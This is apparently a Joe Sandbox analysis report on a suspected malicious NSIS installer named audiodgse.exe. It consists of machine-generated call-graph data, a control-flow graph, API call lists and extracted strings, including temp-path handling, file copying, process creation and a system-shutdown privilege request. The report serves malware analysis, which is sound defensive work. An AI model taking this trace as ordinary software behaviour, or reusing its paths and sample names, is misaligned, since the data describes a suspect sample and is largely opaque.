5752->5754 5753->5752 5755 72be1058 5757 72be1074 5755->5757 5756 72be10dc 5757->5756 5758 72be14bb GlobalFree 5757->5758 5759 72be1091 5757->5759 5758->5759 5760 72be14bb GlobalFree 5759->5760 5761 72be10a1 5760->5761 5762 72be10a8 GlobalSize 5761->5762 5763 72be10b1 5761->5763 5762->5763 5764 72be10c6 5763->5764 5765 72be10b5 GlobalAlloc 5763->5765 5767 72be10d1 GlobalFree 5764->5767 5766 72be14e2 3 API calls 5765->5766 5766->5764 5767->5756 4473 4023a7 4474 402b2c 17 API calls 4473->4474 4475 4023b8 4474->4475 4476 402b2c 17 API calls 4475->4476 4477 4023c1 4476->4477 4478 402b2c 17 API calls 4477->4478 4479 4023cb GetPrivateProfileStringA 4478->4479 5768 40292c 5769 402b0a 17 API calls 5768->5769 5770 402932 5769->5770 5771 402967 5770->5771 5772 402783 5770->5772 5774 402944 5770->5774 5771->5772 5773 405ffc 17 API calls 5771->5773 5773->5772 5774->5772 5776 405f38 wsprintfA 5774->5776 5776->5772 5777 72be15d1 5778 72be14bb GlobalFree 5777->5778 5780 72be15e9 5778->5780 5779 72be162f GlobalFree 5780->5779 5781 72be1604 5780->5781 5782 72be161b VirtualFree 5780->5782 5781->5779 5782->5779 4714 402631 4715 402b0a 17 API calls 4714->4715 4719 40263b 4715->4719 4716 4026a9 4717 405beb ReadFile 4717->4719 4718 4026ab 4723 405f38 wsprintfA 4718->4723 4719->4716 4719->4717 4719->4718 4720 4026bb 4719->4720 4720->4716 4722 4026d1 SetFilePointer 4720->4722 4722->4716 4723->4716 4724 401932 4725 401934 4724->4725 4726 402b2c 17 API calls 4725->4726 4727 401939 4726->4727 4730 4057a2 4727->4730 4770 405a60 4730->4770 4733 4057e1 4737 405919 4733->4737 4784 405fda lstrcpynA 4733->4784 4734 4057ca DeleteFileA 4735 401942 4734->4735 4737->4735 4743 4062dd 2 API calls 4737->4743 4738 405807 4739 40581a 4738->4739 4740 40580d lstrcatA 4738->4740 4785 4059b9 lstrlenA 4739->4785 4741 405820 4740->4741 4744 40582e lstrcatA 4741->4744 4747 405839 lstrlenA FindFirstFileA 4741->4747 4745 405933 4743->4745 4744->4747 4745->4735 4746 405937 4745->4746 4748 405972 3 API calls 4746->4748 4749 40590f 4747->4749 4768 40585d 4747->4768 4750 40593d 4748->4750 4749->4737 4752 40575a 5 API calls 4750->4752 4751 40599d CharNextA 4751->4768 4753 405949 4752->4753 4754 405963 4753->4754 4755 40594d 4753->4755 4758 405101 24 API calls 4754->4758 4755->4735 4760 405101 24 API calls 4755->4760 4756 4058ee FindNextFileA 4759 405906 FindClose 4756->4759 4756->4768 4758->4735 4759->4749 4761 40595a 4760->4761 4762 405db9 36 API calls 4761->4762 4765 405961 4762->4765 4764 4057a2 60 API calls 4764->4768 4765->4735 4766 405101 24 API calls 4766->4756 4767 405101 24 API calls 4767->4768 4768->4751 4768->4756 4768->4764 4768->4766 4768->4767 4789 405fda lstrcpynA 4768->4789 4790 40575a 4768->4790 4798 405db9 MoveFileExA 4768->4798 4802 405fda lstrcpynA 4770->4802 4772 405a71 4803 405a0b CharNextA CharNextA 4772->4803 4775 4057c2 4775->4733 4775->4734 4776 406244 5 API calls 4782 405a87 4776->4782 4777 405ab2 lstrlenA 4778 405abd 4777->4778 4777->4782 4780 405972 3 API calls 4778->4780 4779 4062dd 2 API calls 4779->4782 4781 405ac2 GetFileAttributesA 4780->4781 4781->4775 4782->4775 4782->4777 4782->4779 4783 4059b9 2 API calls 4782->4783 4783->4777 4784->4738 4786 4059c6 4785->4786 4787 4059d7 4786->4787 4788 4059cb CharPrevA 4786->4788 4787->4741 4788->4786 4788->4787 4789->4768 4791 405b4e 2 API calls 4790->4791 4792 405766 4791->4792 4793 405775 RemoveDirectoryA 4792->4793 4794 40577d DeleteFileA 4792->4794 4795 405787 4792->4795 4796 405783 4793->4796 4794->4796 4795->4768 4796->4795 4797 405793 SetFileAttributesA 4796->4797 4797->4795 4799 405dda 4798->4799 4800 405dcd 4798->4800 4799->4768 4809 405c49 4800->4809 4802->4772 4804 405a26 4803->4804 4805 405a36 4803->4805 4804->4805 4806 405a31 CharNextA 4804->4806 4807 40599d CharNextA 4805->4807 4808 405a56 4805->4808 4806->4808 4807->4805 4808->4775 4808->4776 4810 405c95 GetShortPathNameA 4809->4810 4811 405c6f 4809->4811 4813 405db4 4810->4813 4814 405caa 4810->4814 4836 405b73 GetFileAttributesA CreateFileA 4811->4836 4813->4799 4814->4813 4816 405cb2 wsprintfA 4814->4816 4815 405c79 CloseHandle GetShortPathNameA 4815->4813 4817 405c8d 4815->4817 4818 405ffc 17 API calls 4816->4818 4817->4810 4817->4813 4819 405cda 4818->4819 4837 405b73 GetFileAttributesA CreateFileA 4819->4837 4821 405ce7 4821->4813 4822 405cf6 GetFileSize GlobalAlloc 4821->4822 4823 405d18 4822->4823 4824 405dad CloseHandle 4822->4824 4825 405beb ReadFile 4823->4825 4824->4813 4826 405d20 4825->4826 4826->4824 4838 405ad8 lstrlenA 4826->4838 4829 405d37 lstrcpyA 4832 405d59 4829->4832 4830 405d4b 4831 405ad8 4 API calls 4830->4831 4831->4832 4833 405d90 SetFilePointer 4832->4833 4834 405c1a WriteFile 4833->4834 4835 405da6 GlobalFree 4834->4835 4835->4824 4836->4815 4837->4821 4839 405b19 lstrlenA 4838->4839 4840 405b21 4839->4840 4841 405af2 lstrcmpiA 4839->4841 4840->4829 4840->4830 4841->4840 4842 405b10 CharNextA 4841->4842 4842->4839 4843 4022b2 4844 402b2c 17 API calls 4843->4844 4845 4022b8 4844->4845 4846 402b2c 17 API calls 4845->4846 4847 4022c1 4846->4847 4848 402b2c 17 API calls 4847->4848 4849 4022ca 4848->4849 4850 4062dd 2 API calls 4849->4850 4851 4022d3 4850->4851 4852 4022e4 lstrlenA lstrlenA 4851->4852 4856 4022d7 4851->4856 4854 405101 24 API calls 4852->4854 4853 405101 24 API calls 4857 4022df 4853->4857 4855 402320 SHFileOperationA 4854->4855 4855->4856 4855->4857 4856->4853 4856->4857 5790 4044b3 5791 4044c3 5790->5791 5792 4044e9 5790->5792 5793 404068 18 API calls 5791->5793 5794 4040cf 8 API calls 5792->5794 5795 4044d0 SetDlgItemTextA 5793->5795 5796 4044f5 5794->5796 5795->5792 5797 402334 5798 40233b 5797->5798 5801 40234e 5797->5801 5799 405ffc 17 API calls 5798->5799 5800 402348 5799->5800 5800->5801 5802 4056f6 MessageBoxIndirectA 5800->5802 5802->5801 4858 403235 SetErrorMode GetVersion 4859 403276 4858->4859 4860 40327c 4858->4860 4861 406372 5 API calls 4859->4861 4862 406304 3 API calls 4860->4862 4861->4860 4863 403292 lstrlenA 4862->4863 4863->4860 4864 4032a1 4863->4864 4865 406372 5 API calls 4864->4865 4866 4032a8 4865->4866 4867 406372 5 API calls 4866->4867 4868 4032af 4867->4868 4869 406372 5 API calls 4868->4869 4870 4032bb #17 OleInitialize SHGetFileInfoA 4869->4870 4948 405fda lstrcpynA 4870->4948 4873 403307 GetCommandLineA 4949 405fda lstrcpynA 4873->4949 4875 403319 4876 40599d CharNextA 4875->4876 4877 403342 CharNextA 4876->4877 4881 403352 4877->4881 4878 40341c 4879 40342f GetTempPathA 4878->4879 4950 403204 4879->4950 4881->4878 4883 40599d CharNextA 4881->4883 4890 40341e 4881->4890 4882 403447 4884 4034a1 DeleteFileA 4882->4884 4885 40344b GetWindowsDirectoryA lstrcatA 4882->4885 4883->4881 4960 402dc4 GetTickCount GetModuleFileNameA 4884->4960 4887 403204 12 API calls 4885->4887 4889 403467 4887->4889 4888 4034b5 4891 40354b 4888->4891 4894 40353b 4888->4894 4898 40599d CharNextA 4888->4898 4889->4884 4893 40346b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4889->4893 5044 405fda lstrcpynA 4890->5044 5047 40371d 4891->5047 4896 403204 12 API calls 4893->4896 4988 4037f7 4894->4988 4900 403499 4896->4900 4901 4034d0 4898->4901 4900->4884 4900->4891 4908 403516 4901->4908 4909 40357b 4901->4909 4902 403683 4905 403705 ExitProcess 4902->4905 4906 40368b GetCurrentProcess OpenProcessToken 4902->4906 4903 403565 4904 4056f6 MessageBoxIndirectA 4903->4904 4910 403573 ExitProcess 4904->4910 4911 4036d6 4906->4911 4912 4036a6 LookupPrivilegeValueA AdjustTokenPrivileges 4906->4912 4914 405a60 18 API calls 4908->4914 5054 405661 4909->5054 4913 406372 5 API calls 4911->4913 4912->4911 4916 4036dd 4913->4916 4917 403521 4914->4917 4919 4036f2 ExitWindowsEx 4916->4919 4923 4036fe 4916->4923 4917->4891 5045 405fda lstrcpynA 4917->5045 4919->4905 4919->4923 4920 403591 lstrcatA 4921 40359c lstrcatA lstrcmpiA 4920->4921 4921->4891 4922 4035b8 4921->4922 4926 4035c4 4922->4926 4927 4035bd 4922->4927 4928 40140b 2 API calls 4923->4928 4925 403530 5046 405fda lstrcpynA 4925->5046 5062 405644 CreateDirectoryA 4926->5062 5057 4055c7 CreateDirectoryA 4927->5057 4928->4905 4933 4035c9 SetCurrentDirectoryA 4934 4035e3 4933->4934 4935 4035d8 4933->4935 5066 405fda lstrcpynA 4934->5066 5065 405fda lstrcpynA 4935->5065 4938 405ffc 17 API calls 4939 403622 DeleteFileA 4938->4939 4940 40362f CopyFileA 4939->4940 4945 4035f1 4939->4945 4940->4945 4941 403677 4943 405db9 36 API calls 4941->4943 4942 405db9 36 API calls 4942->4945 4943->4891 4944 405ffc 17 API calls 4944->4945 4945->4938 4945->4941 4945->4942 4945->4944 4947 403663 CloseHandle 4945->4947 5067 405679 CreateProcessA 4945->5067 4947->4945 4948->4873 4949->4875 4951 406244 5 API calls 4950->4951 4953 403210 4951->4953 4952 40321a 4952->4882 4953->4952 4954 405972 3 API calls 4953->4954 4955 403222 4954->4955 4956 405644 2 API calls 4955->4956 4957 403228 4956->4957 4958 405ba2 2 API calls 4957->4958 4959 403233 4958->4959 4959->4882 5070 405b73 GetFileAttributesA CreateFileA 4960->5070 4962 402e04 4983 402e14 4962->4983 5071 405fda lstrcpynA 4962->5071 4964 402e2a 4965 4059b9 2 API calls 4964->4965 4966 402e30 4965->4966 5072 405fda lstrcpynA 4966->5072 4968 402e3b GetFileSize 4969 402f35 4968->4969 4981 402e52 4968->4981 5073 402d60 4969->5073 4971 402f3e 4973 402f6e GlobalAlloc 4971->4973 4971->4983 5085 4031ed SetFilePointer 4971->5085 4972 4031d7 ReadFile 4972->4981 5084 4031ed SetFilePointer 4973->5084 4975 402fa1 4979 402d60 6 API calls 4975->4979 4977 402f57 4980 4031d7 ReadFile 4977->4980 4978 402f89 4982 402ffb 35 API calls 4978->4982 4979->4983 4984 402f62 4980->4984 4981->4969 4981->4972 4981->4975 4981->4983 4985 402d60 6 API calls 4981->4985 4986 402f95 4982->4986 4983->4888 4984->4973 4984->4983 4985->4981 4986->4983 4986->4986 4987 402fd2 SetFilePointer 4986->4987 4987->4983 4989 406372 5 API calls 4988->4989 4990 40380b 4989->4990 4991 403811 4990->4991 4992 403823 4990->4992 5105 405f38 wsprintfA 4991->5105 4993 405ec1 3 API calls 4992->4993 4994 40384e 4993->4994 4995 40386c lstrcatA 4994->4995 4997 405ec1 3 API calls 4994->4997 4998 403821 4995->4998 4997->4995 5090 403abc 4998->5090 5001 405a60 18 API calls 5002 40389e 5001->5002 5003 403927 5002->5003 5005 405ec1 3 API calls 5002->5005 5004 405a60 18 API calls 5003->5004 5006 40392d 5004->5006 5008 4038ca 5005->5008 5007 40393d LoadImageA 5006->5007 5009 405ffc 17 API calls 5006->5009 5010 4039e3 5007->5010 5011 403964 RegisterClassA 5007->5011 5008->5003 5012 4038e6 lstrlenA 5008->5012 5016 40599d CharNextA 5008->5016 5009->5007 5015 40140b 2 API calls 5010->5015 5013 4039ed 5011->5013 5014 40399a SystemParametersInfoA CreateWindowExA 5011->5014 5017 4038f4 lstrcmpiA 5012->5017 5018 40391a 5012->5018 5013->4891 5014->5010 5019 4039e9 5015->5019 5020 4038e4 5016->5020 5017->5018 5021 403904 GetFileAttributesA 5017->5021 5022 405972 3 API calls 5018->5022 5019->5013 5024 403abc 18 API calls 5019->5024 5020->5012 5023 403910 5021->5023 5025 403920 5022->5025 5023->5018 5026 4059b9 2 API calls 5023->5026 5027 4039fa 5024->5027 5106 405fda lstrcpynA 5025->5106 5026->5018 5029 403a06 ShowWindow 5027->5029 5030 403a89 5027->5030 5032 406304 3 API calls 5029->5032 5098 4051d3 OleInitialize 5030->5098 5034 403a1e 5032->5034 5033 403a8f 5035 403a93 5033->5035 5036 403aab 5033->5036 5037 403a2c GetClassInfoA 5034->5037 5039 406304 3 API calls 5034->5039 5035->5013 5043 40140b 2 API calls 5035->5043 5038 40140b 2 API calls 5036->5038 5040 403a40 GetClassInfoA RegisterClassA 5037->5040 5041 403a56 DialogBoxParamA 5037->5041 5038->5013 5039->5037 5040->5041 5042 40140b 2 API calls 5041->5042 5042->5013 5043->5013 5044->4879 5045->4925 5046->4894 5048 403735 5047->5048 5049 403727 CloseHandle 5047->5049 5108 403762 5048->5108 5049->5048 5052 4057a2 67 API calls 5053 403554 OleUninitialize 5052->5053 5053->4902 5053->4903 5055 406372 5 API calls 5054->5055 5056 403580 lstrcatA 5055->5056 5056->4920 5056->4921 5058 405618 GetLastError 5057->5058 5059 4035c2 5057->5059 5058->5059 5060 405627 SetFileSecurityA 5058->5060 5059->4933 5060->5059 5061 40563d GetLastError 5060->5061 5061->5059 5063 405654 5062->5063 5064 405658 GetLastError 5062->5064 5063->4933 5064->5063 5065->4934 5066->4945 5068 4056b8 5067->5068 5069 4056ac CloseHandle 5067->5069 5068->4945 5069->5068 5070->4962 5071->4964 5072->4968 5074 402d81 5073->5074 5075 402d69 5073->5075 5076 402d91 GetTickCount 5074->5076 5077 402d89 5074->5077 5078 402d72 DestroyWindow 5075->5078 5079 402d79 5075->5079 5081 402dc2 5076->5081 5082 402d9f CreateDialogParamA ShowWindow 5076->5082 5086 4063ae 5077->5086 5078->5079 5079->4971 5081->4971 5082->5081 5084->4978 5085->4977 5087 4063cb PeekMessageA 5086->5087 5088 4063c1 DispatchMessageA 5087->5088 5089 402d8f 5087->5089 5088->5087 5089->4971 5091 403ad0 5090->5091 5107 405f38 wsprintfA 5091->5107 5093 403b41 5094 403b75 18 API calls 5093->5094 5096 403b46 5094->5096 5095 40387c 5095->5001 5096->5095 5097 405ffc 17 API calls 5096->5097 5097->5096 5099 4040b4 SendMessageA 5098->5099 5100 4051f6 5099->5100 5103 401389 2 API calls 5100->5103 5104 40521d 5100->5104 5101 4040b4 SendMessageA 5102 40522f OleUninitialize 5101->5102 5102->5033 5103->5100 5104->5101 5105->4998 5106->5003 5107->5093 5109 403770 5108->5109 5110 40373a 5109->5110 5111 403775 FreeLibrary GlobalFree 5109->5111 5110->5052 5111->5110 5111->5111 5803 4037b5 5804 4037c0 5803->5804 5805 4037c4 5804->5805 5806 4037c7 GlobalAlloc 5804->5806 5806->5805 5807 4014b7 5808 4014bd 5807->5808 5809 401389 2 API calls 5808->5809 5810 4014c5 5809->5810 5811 402138 5812 402b2c 17 API calls 5811->5812 5813 40213f 5812->5813 5814 402b2c 17 API calls 5813->5814 5815 402149 5814->5815 5816 402b2c 17 API calls 5815->5816 5817 402153 5816->5817 5818 402b2c 17 API calls 5817->5818 5819 40215d 5818->5819 5820 402b2c 17 API calls 5819->5820 5821 402167 5820->5821 5822 4021a9 CoCreateInstance 5821->5822 5823 402b2c 17 API calls 5821->5823 5826 4021c8 5822->5826 5828 402273 5822->5828 5823->5822 5824 401423 24 API calls 5825 4022a9 5824->5825 5827 402253 MultiByteToWideChar 5826->5827 5826->5828 5827->5828 5828->5824 5828->5825 5112 4015bb 5113 402b2c 17 API calls 5112->5113 5114 4015c2 5113->5114 5115 405a0b 4 API calls 5114->5115 5128 4015ca 5115->5128 5116 401624 5118 401652 5116->5118 5119 401629 5116->5119 5117 40599d CharNextA 5117->5128 5122 401423 24 API calls 5118->5122 5120 401423 24 API calls 5119->5120 5121 401630 5120->5121 5131 405fda lstrcpynA 5121->5131 5127 40164a 5122->5127 5124 405644 2 API calls 5124->5128 5125 405661 5 API calls 5125->5128 5126 40163b SetCurrentDirectoryA 5126->5127 5128->5116 5128->5117 5128->5124 5128->5125 5129 40160c GetFileAttributesA 5128->5129 5130 4055c7 4 API calls 5128->5130 5129->5128 5130->5128 5131->5126 5829 40273b 5830 402741 5829->5830 5831 402745 FindNextFileA 5830->5831 5833 402757 5830->5833 5832 402796 5831->5832 5831->5833 5835 405fda lstrcpynA 5832->5835 5835->5833 5836 4016bb 5837 402b2c 17 API calls 5836->5837 5838 4016c1 GetFullPathNameA 5837->5838 5839 4016d8 5838->5839 5845 4016f9 5838->5845 5841 4062dd 2 API calls 5839->5841 5839->5845 5840 40170d GetShortPathNameA 5842 4029b8 5840->5842 5843 4016e9 5841->5843 5843->5845 5846 405fda lstrcpynA 5843->5846 5845->5840 5845->5842 5846->5845 5132 40243d 5133 402b2c 17 API calls 5132->5133 5134 40244f 5133->5134 5135 402b2c 17 API calls 5134->5135 5136 402459 5135->5136 5149 402bbc 5136->5149 5139 4029b8 5140 40248e 5141 40249a 5140->5141 5143 402b0a 17 API calls 5140->5143 5144 4024b9 RegSetValueExA 5141->5144 5146 402ffb 35 API calls 5141->5146 5142 402b2c 17 API calls 5145 402487 lstrlenA 5142->5145 5143->5141 5147 4024cf RegCloseKey 5144->5147 5145->5140 5146->5144 5147->5139 5150 402bd7 5149->5150 5153 405e8e 5150->5153 5154 405e9d 5153->5154 5155 402469 5154->5155 5156 405ea8 RegCreateKeyExA 5154->5156 5155->5139 5155->5140 5155->5142 5156->5155 5157 40523f 5158 405261 GetDlgItem GetDlgItem GetDlgItem 5157->5158 5159 4053ea 5157->5159 5203 40409d SendMessageA 5158->5203 5161 4053f2 GetDlgItem CreateThread CloseHandle 5159->5161 5162 40541a 5159->5162 5161->5162 5206 4051d3 5 API calls 5161->5206 5163 405448 5162->5163 5165 405430 ShowWindow ShowWindow 5162->5165 5166 405469 5162->5166 5167 405450 5163->5167 5168 4054a3 5163->5168 5164 4052d1 5173 4052d8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5164->5173 5205 40409d SendMessageA 5165->5205 5172 4040cf 8 API calls 5166->5172 5170 405458 5167->5170 5171 40547c ShowWindow 5167->5171 5168->5166 5176 4054b0 SendMessageA 5168->5176 5177 404041 SendMessageA 5170->5177 5179 40549c 5171->5179 5180 40548e 5171->5180 5178 405475 5172->5178 5174 405346 5173->5174 5175 40532a SendMessageA SendMessageA 5173->5175 5181 405359 5174->5181 5182 40534b SendMessageA 5174->5182 5175->5174 5176->5178 5183 4054c9 CreatePopupMenu 5176->5183 5177->5166 5185 404041 SendMessageA 5179->5185 5184 405101 24 API calls 5180->5184 5187 404068 18 API calls 5181->5187 5182->5181 5186 405ffc 17 API calls 5183->5186 5184->5179 5185->5168 5188 4054d9 AppendMenuA 5186->5188 5189 405369 5187->5189 5190 4054f7 GetWindowRect 5188->5190 5191 40550a TrackPopupMenu 5188->5191 5192 405372 ShowWindow 5189->5192 5193 4053a6 GetDlgItem SendMessageA 5189->5193 5190->5191 5191->5178 5194 405526 5191->5194 5195 405395 5192->5195 5196 405388 ShowWindow 5192->5196 5193->5178 5197 4053cd SendMessageA SendMessageA 5193->5197 5198 405545 SendMessageA 5194->5198 5204 40409d SendMessageA 5195->5204 5196->5195 5197->5178 5198->5198 5199 405562 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5198->5199 5201 405584 SendMessageA 5199->5201 5201->5201 5202 4055a6 GlobalUnlock SetClipboardData CloseClipboard 5201->5202 5202->5178 5203->5164 5204->5193 5205->5163 5847 401b3f 5848 402b2c 17 API calls 5847->5848 5849 401b46 5848->5849 5850 402b0a 17 API calls 5849->5850 5851 401b4f wsprintfA 5850->5851 5852 4029b8 5851->5852

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403235-403274 SetErrorMode GetVersion 1 403276-40327e call 406372 0->1 2 403287 0->2 1->2 7 403280 1->7 4 40328c-40329f call 406304 lstrlenA 2->4 9 4032a1-4032bd call 406372 * 3 4->9 7->2 16 4032ce-40332c #17 OleInitialize SHGetFileInfoA call 405fda GetCommandLineA call 405fda 9->16 17 4032bf-4032c5 9->17 24 403338-40334d call 40599d CharNextA 16->24 25 40332e-403333 16->25 17->16 21 4032c7 17->21 21->16 28 403412-403416 24->28 25->24 29 403352-403355 28->29 30 40341c 28->30 31 403357-40335b 29->31 32 40335d-403365 29->32 33 40342f-403449 GetTempPathA call 403204 30->33 31->31 31->32 34 403367-403368 32->34 35 40336d-403370 32->35 43 4034a1-4034bb DeleteFileA call 402dc4 33->43 44 40344b-403469 GetWindowsDirectoryA lstrcatA call 403204 33->44 34->35 37 403402-40340f call 40599d 35->37 38 403376-40337a 35->38 37->28 52 403411 37->52 41 403392-4033bf 38->41 42 40337c-403382 38->42 49 4033c1-4033c7 41->49 50 4033d2-403400 41->50 47 403384-403386 42->47 48 403388 42->48 58 4034c1-4034c7 43->58 59 40354f-40355f call 40371d OleUninitialize 43->59 44->43 61 40346b-40349b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403204 44->61 47->41 47->48 48->41 54 4033c9-4033cb 49->54 55 4033cd 49->55 50->37 57 40341e-40342a call 405fda 50->57 52->28 54->50 54->55 55->50 57->33 62 4034c9-4034d4 call 40599d 58->62 63 40353f-403546 call 4037f7 58->63 72 403683-403689 59->72 73 403565-403575 call 4056f6 ExitProcess 59->73 61->43 61->59 74 4034d6-4034ff 62->74 75 40350a-403514 62->75 70 40354b 63->70 70->59 77 403705-40370d 72->77 78 40368b-4036a4 GetCurrentProcess OpenProcessToken 72->78 79 403501-403503 74->79 82 403516-403523 call 405a60 75->82 83 40357b-40358f call 405661 lstrcatA 75->83 80 403713-403717 ExitProcess 77->80 81 40370f 77->81 85 4036d6-4036e4 call 406372 78->85 86 4036a6-4036d0 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 88 403505-403508 79->88 81->80 82->59 96 403525-40353b call 405fda * 2 82->96 97 403591-403597 lstrcatA 83->97 98 40359c-4035b6 lstrcatA lstrcmpiA 83->98 94 4036f2-4036fc ExitWindowsEx 85->94 95 4036e6-4036f0 85->95 86->85 88->75 88->79 94->77 100 4036fe-403700 call 40140b 94->100 95->94 95->100 96->63 97->98 98->59 99 4035b8-4035bb 98->99 103 4035c4 call 405644 99->103 104 4035bd-4035c2 call 4055c7 99->104 100->77 112 4035c9-4035d6 SetCurrentDirectoryA 103->112 104->112 113 4035e3-40360b call 405fda 112->113 114 4035d8-4035de call 405fda 112->114 118 403611-40362d call 405ffc DeleteFileA 113->118 114->113 121 40366e-403675 118->121 122 40362f-40363f CopyFileA 118->122 121->118 124 403677-40367e call 405db9 121->124 122->121 123 403641-403661 call 405db9 call 405ffc call 405679 122->123 123->121 133 403663-40366a CloseHandle 123->133 124->59 133->121
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040325A
                                                  • GetVersion.KERNEL32 ref: 00403260
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032CF
                                                  • OleInitialize.OLE32(00000000), ref: 004032D6
                                                  • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032F2
                                                  • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00403307
                                                  • CharNextA.USER32(00000000), ref: 00403343
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403440
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403451
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040345D
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403471
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403479
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348A
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403492
                                                  • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034A6
                                                    • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                    • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F
                                                    • Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754), ref: 004038E7
                                                    • Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000), ref: 004038FA
                                                    • Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                    • Part of subcall function 004037F7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                    • Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                    • Part of subcall function 0040371D: CloseHandle.KERNEL32(00000190), ref: 00403728
                                                  • OleUninitialize.OLE32 ref: 00403554
                                                  • ExitProcess.KERNEL32 ref: 00403575
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403692
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403699
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
                                                  • ExitProcess.KERNEL32 ref: 00403717
                                                    • Part of subcall function 004056F6: MessageBoxIndirectA.USER32 ref: 00405751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                  • String ID: "$"C:\Users\user\AppData\Roaming\audiodgse.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$C:\Users\user\AppData\Roaming\audiodgse.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3776617018-100158310
                                                  • Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                  • Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
                                                  • Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                                  • Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
